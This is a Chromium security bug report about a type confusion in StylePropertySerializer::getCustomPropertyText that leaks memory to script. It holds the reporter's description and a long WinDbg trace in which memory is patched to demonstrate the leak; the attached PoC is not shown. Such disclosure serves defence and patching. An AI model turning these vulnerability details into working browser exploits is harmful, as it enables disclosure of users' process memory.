New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Aug 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: Windows
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 622420: Security: Type confusion in StylePropertySerializer::getCustomPropertyText.

Reported by zdi-disc...@hp.com, Jun 22 2016

Issue description

ZDI-CAN-3840: Google Chrome StylePropertySerializer Type Confusion Information Disclosure Vulnerability


-- CVSS -----------------------------------------

4.3, AV:N/AC:M/Au:N/C:P/I:N/A:N


-- ABSTRACT -------------------------------------

Trend Micro's Zero Day Initiative has identified a vulnerability affecting the following products:

  Google Chrome


-- VULNERABILITY DETAILS ------------------------

* Version tested: Chromium for Windows 64-bit (commit 42b7246433e2b79901292d2bc97dc6607530fac2)

* Platform tested: Windows 10 Enterprise 1511 64-bit

Type confusion in StylePropertySerializer::getCustomPropertyText. StylePropertySerializer::getCustomPropertyText has pointer to a CSSVariableReferenceValue and improperly casts it to `CSSCustomPropertyDeclaration*`. Consequentially CSSCustomPropertyDeclaration.name takes a pointer to a CSSVariableData object and uses it as an `AtomicString*`. The end result is that some memory contents are disclosed to the calling script. Some memory preparation is needed to ensure that only valid memory is read so that the process does not crash, but this appears quite feasible.

Running the attached PoC on either the Debug or Release build of Chromium without a debugger attached results in an "Aw Snap".

Debug log (from release build)

```
************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
OK                                             C:\chromium\src
OK                                             C:\chromium\src\third_party\WebKit\Source\core\css\parser
OK                                             C:\chromium\src\third_party\WebKit\Source\core\css

Microsoft (R) Windows Debugger Version 10.0.10586.567 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach

************* Symbol Path validation summary **************
Response                         Time (ms)     Location
Deferred                                       symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
Symbol search path is: symsrv*symsrv.dll*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is: 
ModLoad: 00007ff6`a29a0000 00007ff6`a37a6000   C:\chromium\src\out\Release1\chrome.exe
ModLoad: 00007ffe`0b350000 00007ffe`0b511000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffe`08a20000 00007ffe`08acd000   C:\Windows\system32\KERNEL32.DLL
ModLoad: 00007ffe`08430000 00007ffe`08618000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 00007ffe`0b020000 00007ffe`0b0c7000   C:\Windows\system32\ADVAPI32.dll
ModLoad: 00007ffe`0a0d0000 00007ffe`0a16d000   C:\Windows\system32\msvcrt.dll
ModLoad: 00007ffe`0a3b0000 00007ffe`0a40b000   C:\Windows\system32\sechost.dll
ModLoad: 00007ffe`08900000 00007ffe`08a1c000   C:\Windows\system32\RPCRT4.dll
ModLoad: 00007ffe`0a220000 00007ffe`0a3a6000   C:\Windows\system32\GDI32.dll
ModLoad: 00007ffe`0a8a0000 00007ffe`0a9f6000   C:\Windows\system32\USER32.dll
ModLoad: 00007ffe`0a890000 00007ffe`0a898000   C:\Windows\system32\PSAPI.DLL
ModLoad: 00007ffe`08ad0000 00007ffe`0a02c000   C:\Windows\system32\SHELL32.dll
ModLoad: 00007ffe`08350000 00007ffe`08393000   C:\Windows\system32\cfgmgr32.dll
ModLoad: 00007ffe`07d00000 00007ffe`08344000   C:\Windows\system32\windows.storage.dll
ModLoad: 00007ffe`0a5e0000 00007ffe`0a85d000   C:\Windows\system32\combase.dll
ModLoad: 00007ffe`08620000 00007ffe`0868a000   C:\Windows\system32\bcryptPrimitives.dll
ModLoad: 00007ffe`0a030000 00007ffe`0a082000   C:\Windows\system32\shlwapi.dll
ModLoad: 00007ffe`07980000 00007ffe`0798f000   C:\Windows\system32\kernel.appcore.dll
ModLoad: 00007ffe`08690000 00007ffe`08745000   C:\Windows\system32\shcore.dll
ModLoad: 00007ffe`07990000 00007ffe`079db000   C:\Windows\system32\powrprof.dll
ModLoad: 00007ffe`079e0000 00007ffe`079f4000   C:\Windows\system32\profapi.dll
ModLoad: 00007ffe`0afb0000 00007ffe`0b01b000   C:\Windows\system32\WS2_32.dll
ModLoad: 00007ffe`07b10000 00007ffe`07b27000   C:\Windows\system32\NETAPI32.dll
ModLoad: 00007ffe`07b30000 00007ffe`07cf8000   C:\Windows\system32\CRYPT32.dll
ModLoad: 00007ffe`07970000 00007ffe`07980000   C:\Windows\system32\MSASN1.dll
ModLoad: 00007ffd`f9870000 00007ffd`f9927000   C:\chromium\src\out\Release1\chrome_elf.dll
ModLoad: 00007ffe`04a70000 00007ffe`04a88000   C:\Windows\SYSTEM32\USP10.dll
ModLoad: 00007ffd`fec20000 00007ffd`fec2a000   C:\Windows\SYSTEM32\VERSION.dll
ModLoad: 00007ffd`f9cb0000 00007ffd`f9f59000   C:\Windows\SYSTEM32\WININET.dll
ModLoad: 00007ffe`06070000 00007ffe`06093000   C:\Windows\SYSTEM32\WINMM.dll
ModLoad: 00007ffe`070d0000 00007ffe`070ef000   C:\Windows\SYSTEM32\USERENV.dll
ModLoad: 00007ffe`057e0000 00007ffe`057f3000   C:\Windows\SYSTEM32\WTSAPI32.dll
ModLoad: 00007ffd`fbb00000 00007ffd`fbcb7000   C:\Windows\SYSTEM32\urlmon.dll
ModLoad: 00007ffe`040b0000 00007ffe`04178000   C:\Windows\SYSTEM32\WINHTTP.dll
ModLoad: 00007ffe`01bf0000 00007ffe`01c0a000   C:\Windows\SYSTEM32\dhcpcsvc.DLL
ModLoad: 00007ffe`0a880000 00007ffe`0a888000   C:\Windows\system32\NSI.dll
ModLoad: 00007ffe`04250000 00007ffe`04288000   C:\Windows\SYSTEM32\IPHLPAPI.DLL
ModLoad: 00007ffe`040a0000 00007ffe`040ac000   C:\Windows\SYSTEM32\Secur32.dll
ModLoad: 00007ffe`06010000 00007ffe`0603c000   C:\Windows\SYSTEM32\WINMMBASE.dll
ModLoad: 00007ffd`ff3c0000 00007ffd`ff743000   C:\Windows\SYSTEM32\iertutil.dll
ModLoad: 00007ffe`07890000 00007ffe`0789b000   C:\Windows\SYSTEM32\CRYPTBASE.DLL
ModLoad: 00007ffe`06d80000 00007ffe`06d8c000   C:\Windows\SYSTEM32\NETUTILS.DLL
ModLoad: 00007ffe`03710000 00007ffe`03726000   C:\Windows\SYSTEM32\WKSCLI.DLL
ModLoad: 00007ffe`078a0000 00007ffe`078c9000   C:\Windows\SYSTEM32\bcrypt.dll
ModLoad: 00007ffe`075e0000 00007ffe`0760d000   C:\Windows\SYSTEM32\SSPICLI.DLL
ModLoad: 00007ffe`0a090000 00007ffe`0a0cb000   C:\Windows\system32\IMM32.DLL
ModLoad: 00007ffd`e12e0000 00007ffd`e62ad000   C:\chromium\src\out\Release1\chrome_child.dll
ModLoad: 00007ffe`0aa00000 00007ffe`0ab0b000   C:\Windows\system32\COMDLG32.dll
ModLoad: 00007ffe`083a0000 00007ffe`08426000   C:\Windows\system32\FirewallAPI.dll
ModLoad: 00007ffe`08750000 00007ffe`08893000   C:\Windows\system32\ole32.dll
ModLoad: 00007ffe`0b280000 00007ffe`0b341000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 00007ffe`07a00000 00007ffe`07a55000   C:\Windows\system32\WINTRUST.dll
ModLoad: 00007ffd`f9020000 00007ffd`f9294000   C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\COMCTL32.dll
ModLoad: 00007ffe`02cf0000 00007ffe`02d74000   C:\Windows\SYSTEM32\WINSPOOL.DRV
ModLoad: 00007ffd`f8970000 00007ffd`f89da000   C:\Windows\SYSTEM32\OLEACC.dll
ModLoad: 00007ffe`01460000 00007ffe`01488000   C:\Windows\SYSTEM32\NTDSAPI.dll
ModLoad: 00007ffe`03b80000 00007ffe`03d0c000   C:\Windows\SYSTEM32\dbghelp.dll
ModLoad: 00007ffd`f87b0000 00007ffd`f87bc000   C:\Windows\SYSTEM32\DAVHLPR.DLL
ModLoad: 00007ffe`066f0000 00007ffe`06722000   C:\Windows\system32\fwbase.dll
ModLoad: 00007ffd`fdae0000 00007ffd`fdd40000   C:\Windows\SYSTEM32\dwrite.dll
(d78.6f4): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007ffe`0b3f8870 cc              int     3
0:009> bp @@masm(`chrome_child!CSSPropertyParser.cpp:172+`) 4;
*** WARNING: Unable to verify checksum for C:\chromium\src\out\Release1\chrome_child.dll
0:009> bp @@masm(`chrome_child!StylePropertySerializer.cpp:184+`);
0:009> g
Breakpoint 0 hit
chrome_child!blink::CSSPropertyParser::parseValueStart+0x57:
00007ffd`e3b20b8f 803d86951c0200  cmp     byte ptr [chrome_child!blink::RuntimeEnabledFeatures::isCSSVariablesEnabled (00007ffd`e5cea11c)],0 ds:00007ffd`e5cea11c=01
0:000> k
 # Child-SP          RetAddr           Call Site
00 00000012`f836aca0 00007ffd`e3b20b18 chrome_child!blink::CSSPropertyParser::parseValueStart+0x57 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 173]
01 00000012`f836ad00 00007ffd`e3b0bc10 chrome_child!blink::CSSPropertyParser::parseValue+0xf0 [c:\chromium\src\third_party\webkit\source\core\css\parser\csspropertyparser.cpp @ 121]
02 00000012`f836ad60 00007ffd`e3b0edbd chrome_child!blink::CSSParserImpl::consumeDeclarationValue+0x2c [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 804]
03 00000012`f836ada0 00007ffd`e3b075f8 chrome_child!blink::CSSParserImpl::parseValue+0xb1 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparserimpl.cpp @ 50]
04 (Inline Function) --------`-------- chrome_child!blink::CSSParser::parseValue+0x1a [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 99]
05 00000012`f836be80 00007ffd`e3b532e4 chrome_child!blink::CSSParser::parseValue+0xd8 [c:\chromium\src\third_party\webkit\source\core\css\parser\cssparser.cpp @ 75]
06 00000012`f836bf80 00007ffd`e3b52f6c chrome_child!blink::EditingStyle::mergeStyle+0x368 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1184]
07 00000012`f836c010 00007ffd`e3b85358 chrome_child!blink::EditingStyle::mergeInlineStyleOfElement+0x88 [c:\chromium\src\third_party\webkit\source\core\editing\editingstyle.cpp @ 1058]
08 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0xc0 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1119]
09 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283]
0a 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681]
0b 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236]
0c 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255]
0d 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97]
0e 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209]
0f 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579]
10 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104]
11 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811]
12 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468]
13 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162]
14 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20]
15 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961]
16 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977]
17 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975]
18 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb
19 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968
1a 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb
1b 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f
1c 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9
1d 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9
1e 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0
1f 00000012`f836c948 00000012`f836c910 0x00000378`41b06301
20 00000012`f836c950 00000003`00000000 0x00000012`f836c910
21 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000
22 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8
23 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9
24 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311
25 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9
26 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411
27 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411
28 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321
29 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9
2a 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9
2b 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311
2c 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9
2d 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631
2e 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8
2f 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64
30 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49
31 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9
32 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81
33 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000
34 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00
35 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003
0:000> tct
chrome_child!blink::CSSPropertyParser::parseValueStart+0x74:
00007ffd`e3b20bac e8af7b0000      call    chrome_child!blink::CSSVariableParser::containsValidVariableReferences (00007ffd`e3b28760)
0:000> p
chrome_child!blink::CSSPropertyParser::parseValueStart+0x79:
00007ffd`e3b20bb1 84c0            test    al,al
0:000> tct
chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]:
00007ffd`e3b20bc1 e8c6bd6dfe      call    chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c)
0:000> r
rax=0000000000000201 rbx=00000012f836ad20 rcx=0000000000000038
rdx=00007ffde5770480 rsi=0000000000000002 rdi=0000000000000002
rip=00007ffde3b20bc1 rsp=00000012f836aca0 rbp=00000012f836ae00
 r8=00007ffde5e94888  r9=00000012f836aa01 r10=00007ffde56dc650
r11=0000000000000001 r12=0000000000000001 r13=00000350846c92a0
r14=00000012f836ae18 r15=0000000000000000
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
chrome_child!blink::CSSVariableData::operator new+0xc [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x89]:
00007ffd`e3b20bc1 e8c6bd6dfe      call    chrome_child!WTF::Partitions::fastMalloc (00007ffd`e21fc98c)
0:000> p
chrome_child!blink::CSSVariableData::create+0x11 [inlined in chrome_child!blink::CSSPropertyParser::parseValueStart+0x8e]:
00007ffd`e3b20bc6 4885c0          test    rax,rax
0:000> ?@rax
Evaluate expression: 2472915841448 = 0000023f`c54531a8
0:000> ed @rax+4 20
0:000> g
Breakpoint 1 hit
chrome_child!WTF::RefPtr<WTF::StringImpl>::get [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52]:
00007ffd`e3af62be 488b4b08        mov     rcx,qword ptr [rbx+8] ds:000003f6`9bc83a80=0000023fc54531a8
0:000> k
 # Child-SP          RetAddr           Call Site
00 (Inline Function) --------`-------- chrome_child!WTF::RefPtr<WTF::StringImpl>::get
01 (Inline Function) --------`-------- chrome_child!WTF::String::impl
02 (Inline Function) --------`-------- chrome_child!WTF::AtomicString::impl
03 (Inline Function) --------`-------- chrome_child!WTF::StringView::{ctor}
04 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 184]
05 00000012`f836bde0 00007ffd`e3af882f chrome_child!blink::StylePropertySerializer::asText+0x49b [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 241]
06 00000012`f836bfb0 00007ffd`e3b853a6 chrome_child!blink::StylePropertySet::asText+0x33 [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyset.cpp @ 379]
07 00000012`f836c040 00007ffd`e3b8807c chrome_child!blink::ApplyStyleCommand::applyInlineStyleToPushDown+0x10e [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1120]
08 00000012`f836c0a0 00007ffd`e3b840b0 chrome_child!blink::ApplyStyleCommand::removeInlineStyle+0x350 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 1283]
09 00000012`f836c2a0 00007ffd`e3b85e8b chrome_child!blink::ApplyStyleCommand::applyInlineStyle+0x3cc [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 681]
0a 00000012`f836c3d0 00007ffd`e3b8a47c chrome_child!blink::ApplyStyleCommand::doApply+0xb7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\applystylecommand.cpp @ 236]
0b 00000012`f836c400 00007ffd`e3b9d51b chrome_child!blink::CompositeEditCommand::applyCommandToComposite+0x34 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 255]
0c 00000012`f836c430 00007ffd`e3b8a345 chrome_child!blink::RemoveFormatCommand::doApply+0xd7 [c:\chromium\src\third_party\webkit\source\core\editing\commands\removeformatcommand.cpp @ 97]
0d 00000012`f836c470 00007ffd`e3b5e066 chrome_child!blink::CompositeEditCommand::apply+0x89 [c:\chromium\src\third_party\webkit\source\core\editing\commands\compositeeditcommand.cpp @ 209]
0e 00000012`f836c4a0 00007ffd`e3b951ec chrome_child!blink::Editor::removeFormattingAndStyle+0x42 [c:\chromium\src\third_party\webkit\source\core\editing\editor.cpp @ 579]
0f 00000012`f836c4d0 00007ffd`e3b932b9 chrome_child!blink::executeRemoveFormat+0x10 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1104]
10 00000012`f836c500 00007ffd`e38c07c2 chrome_child!blink::Editor::Command::execute+0x189 [c:\chromium\src\third_party\webkit\source\core\editing\commands\editorcommand.cpp @ 1811]
11 00000012`f836c550 00007ffd`e37b8766 chrome_child!blink::Document::execCommand+0x18a [c:\chromium\src\third_party\webkit\source\core\dom\document.cpp @ 4468]
12 00000012`f836c5b0 00007ffd`e24a7041 chrome_child!blink::DocumentV8Internal::execCommandMethod+0x2da [c:\chromium\src\out\release1\gen\blink\bindings\core\v8\v8document.cpp @ 4162]
13 00000012`f836c690 00007ffd`e252937b chrome_child!v8::internal::FunctionCallbackArguments::Call+0x151 [c:\chromium\src\v8\src\api-arguments.cc @ 20]
14 00000012`f836c760 00007ffd`e2512e82 chrome_child!v8::internal::`anonymous namespace'::HandleApiCallHelper+0x4cb [c:\chromium\src\v8\src\builtins.cc @ 4961]
15 00000012`f836c890 00007ffd`e25067ab chrome_child!v8::internal::Builtin_Impl_HandleApiCall+0x42 [c:\chromium\src\v8\src\builtins.cc @ 4977]
16 00000012`f836c8d0 00000378`41b063cb chrome_child!v8::internal::Builtin_HandleApiCall+0x3b [c:\chromium\src\v8\src\builtins.cc @ 4975]
17 00000012`f836c910 00000012`f836c968 0x00000378`41b063cb
18 00000012`f836c918 00000378`41b063cb 0x00000012`f836c968
19 00000012`f836c920 00007ffd`e27c292f 0x00000378`41b063cb
1a 00000012`f836c928 00000378`41b70aa9 chrome_child!v8::internal::Runtime_LoadElementWithInterceptor+0x22f
1b 00000012`f836c930 000002cc`16b176e9 0x00000378`41b70aa9
1c 00000012`f836c938 000001cf`740eead0 0x000002cc`16b176e9
1d 00000012`f836c940 00000378`41b06301 0x000001cf`740eead0
1e 00000012`f836c948 00000012`f836c910 0x00000378`41b06301
1f 00000012`f836c950 00000003`00000000 0x00000012`f836c910
20 00000012`f836c958 00000012`f836c9b8 0x00000003`00000000
21 00000012`f836c960 00000378`41b70ae9 0x00000012`f836c9b8
22 00000012`f836c968 000000e9`fd704311 0x00000378`41b70ae9
23 00000012`f836c970 000002dd`665185c9 0x000000e9`fd704311
24 00000012`f836c978 000000e9`fd704411 0x000002dd`665185c9
25 00000012`f836c980 000000e9`fd704411 0x000000e9`fd704411
26 00000012`f836c988 000002dd`66550321 0x000000e9`fd704411
27 00000012`f836c990 00000182`aa205af9 0x000002dd`66550321
28 00000012`f836c998 000002dd`665185c9 0x00000182`aa205af9
29 00000012`f836c9a0 000000e9`fd704311 0x000002dd`665185c9
2a 00000012`f836c9a8 000002dd`665506b9 0x000000e9`fd704311
2b 00000012`f836c9b0 000000e9`fd7ba631 0x000002dd`665506b9
2c 00000012`f836c9b8 00000012`f836c9e8 0x000000e9`fd7ba631
2d 00000012`f836c9c0 00000378`41b42b64 0x00000012`f836c9e8
2e 00000012`f836c9c8 00000182`aa205b49 0x00000378`41b42b64
2f 00000012`f836c9d0 000002dd`665506b9 0x00000182`aa205b49
30 00000012`f836c9d8 00000378`41b42a81 0x000002dd`665506b9
31 00000012`f836c9e0 0000000c`00000000 0x00000378`41b42a81
32 00000012`f836c9e8 00000012`f836cb00 0x0000000c`00000000
33 00000012`f836c9f0 00000378`41b27003 0x00000012`f836cb00
34 00000012`f836c9f8 00000000`00000000 0x00000378`41b27003
0:000> ba r 1 0000023f`c54531a8+c
0:000> gu
chrome_child!WTF::StringView::{ctor} [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x56]:
00007ffd`e3af62c2 4885c9          test    rcx,rcx
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x3 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x59]:
00007ffd`e3af62c5 7512            jne     chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d (00007ffd`e3af62d9) [br=1]
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x17 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x6d]:
00007ffd`e3af62d9 8b4104          mov     eax,dword ptr [rcx+4] ds:0000023f`c54531ac=00000020
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x1a [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x70]:
00007ffd`e3af62dc 8945d0          mov     dword ptr [rbp-30h],eax ss:00000012`f836bd90=956c66b0
0:000> gu
chrome_child!WTF::StringImpl::bytes [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x73]:
00007ffd`e3af62df 488d410c        lea     rax,[rcx+0Ch]
0:000> gu
chrome_child!WTF::StringImpl::bytes+0x4 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x77]:
00007ffd`e3af62e3 488945c8        mov     qword ptr [rbp-38h],rax ss:00000012`f836bd88=00007ffde3af36a7
0:000> gu
chrome_child!WTF::StringView::{ctor}+0x25 [inlined in chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7b]:
00007ffd`e3af62e7 48894dc0        mov     qword ptr [rbp-40h],rcx ss:00000012`f836bd80=0000000000000001
0:000> gu
chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x7f:
00007ffd`e3af62eb 488d55c0        lea     rdx,[rbp-40h]
0:000> gu
Breakpoint 2 hit
chrome_child!MoveSmall+0x20d:
00007ffd`e4e7a9e4 4883c110        add     rcx,10h
0:000> ub .
chrome_child!MoveSmall+0x1f0 [f:\dd\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 424]:
00007ffd`e4e7a9c7 0f10440ae0      movups  xmm0,xmmword ptr [rdx+rcx-20h]
00007ffd`e4e7a9cc 0f104c0af0      movups  xmm1,xmmword ptr [rdx+rcx-10h]
00007ffd`e4e7a9d1 75ad            jne     chrome_child!MoveSmall+0x1a9 (00007ffd`e4e7a980)
00007ffd`e4e7a9d3 0f2941e0        movaps  xmmword ptr [rcx-20h],xmm0
00007ffd`e4e7a9d7 4983e07f        and     r8,7Fh
00007ffd`e4e7a9db 0f28c1          movaps  xmm0,xmm1
00007ffd`e4e7a9de eb0c            jmp     chrome_child!MoveSmall+0x215 (00007ffd`e4e7a9ec)
00007ffd`e4e7a9e0 0f10040a        movups  xmm0,xmmword ptr [rdx+rcx]
0:000> bl
 0 e 00007ffd`e3b20b8f     0001 (0004)  0:**** chrome_child!blink::CSSPropertyParser::parseValueStart+0x57
 1 e 00007ffd`e3af62be     0001 (0001)  0:**** chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x52
 2 e 0000023f`c54531b4 r 1 0001 (0001)  0:**** 
0:000> dq 0000023f`c54531b4
0000023f`c54531b4  9c00e500`000004f2 00000004`000004f2
0000023f`c54531c4  00000001`00000003 00000000`00000000
0000023f`c54531d4  00000000`00000000 3f020000`00000000
0000023f`c54531e4  00000000`183245c5 00000000`00000000
0000023f`c54531f4  00000000`00000000 00000000`00000000
0000023f`c5453204  00000000`00000000 00000000`00000000
0000023f`c5453214  3f020000`00000000 00000000`503245c5
0000023f`c5453224  00000000`00000000 00000000`00000000
0:000> t
chrome_child!MoveSmall+0x211:
00007ffd`e4e7a9e8 4983e810        sub     r8,10h
0:000> t
chrome_child!MoveSmall+0x215:
00007ffd`e4e7a9ec 4d8bc8          mov     r9,r8
0:000> t
chrome_child!MoveSmall+0x218:
00007ffd`e4e7a9ef 49c1e904        shr     r9,4
0:000> t
chrome_child!MoveSmall+0x21c:
00007ffd`e4e7a9f3 741c            je      chrome_child!MoveSmall+0x23a (00007ffd`e4e7aa11) [br=0]
0:000> t
chrome_child!MoveSmall+0x21e:
00007ffd`e4e7a9f5 6666660f1f840000000000 nop word ptr [rax+rax]
0:000> t
chrome_child!MoveSmall+0x229:
00007ffd`e4e7aa00 0f1141f0        movups  xmmword ptr [rcx-10h],xmm0 ds:000004f2`9c0780fe=00000000000000000000000000000000
0:000> dq 000004f2`9c0780fe
000004f2`9c0780fe  00000000`00000000 00000000`00000000
000004f2`9c07810e  00000000`00000000 00000000`00000000
000004f2`9c07811e  00000000`00000000 00000000`00000000
000004f2`9c07812e  00000000`00000000 00000000`00000000
000004f2`9c07813e  00000000`00150000 00000000`00004100
000004f2`9c07814e  00000001`00138000 00000000`00004100
000004f2`9c07815e  00000002`00148000 00000000`00004100
000004f2`9c07816e  00000003`00198000 00000000`00004100
0:000> gu
chrome_child!WTF::StringBuilder::append+0x13e:
00007ffd`e220adae 44897318        mov     dword ptr [rbx+18h],r14d ds:00000012`f836bdb0=00000001
0:000> dq 000004f2`9c0780fe
000004f2`9c0780fe  9c00e500`000004f2 00000004`000004f2
000004f2`9c07810e  00000001`00000003 00000000`00000000
000004f2`9c07811e  00000000`00000000 3f020000`00000000
000004f2`9c07812e  00000000`183245c5 00000000`00000000
000004f2`9c07813e  00000000`00150000 00000000`00004100
000004f2`9c07814e  00000001`00138000 00000000`00004100
000004f2`9c07815e  00000002`00148000 00000000`00004100
000004f2`9c07816e  00000003`00198000 00000000`00004100
0:000> eu 000004f2`9c0780fe+10 "PWNED"
0:000> bp chrome_child!blink::ChromeClient::openJavaScriptAlert
0:000> gu
chrome_child!WTF::StringBuilder::append+0x96:
00007ffd`e21fcb2a 488b5c2430      mov     rbx,qword ptr [rsp+30h] ss:00000012`f836bd60=000003f69bc83a78
0:000> gu
    could step in/over inline function frames ...
03 00000012`f836bd60 00007ffd`e3af4b8f chrome_child!blink::StylePropertySerializer::getCustomPropertyText+0x8c [c:\chromium\src\third_party\webkit\source\core\css\stylepropertyserializer.cpp @ 185]
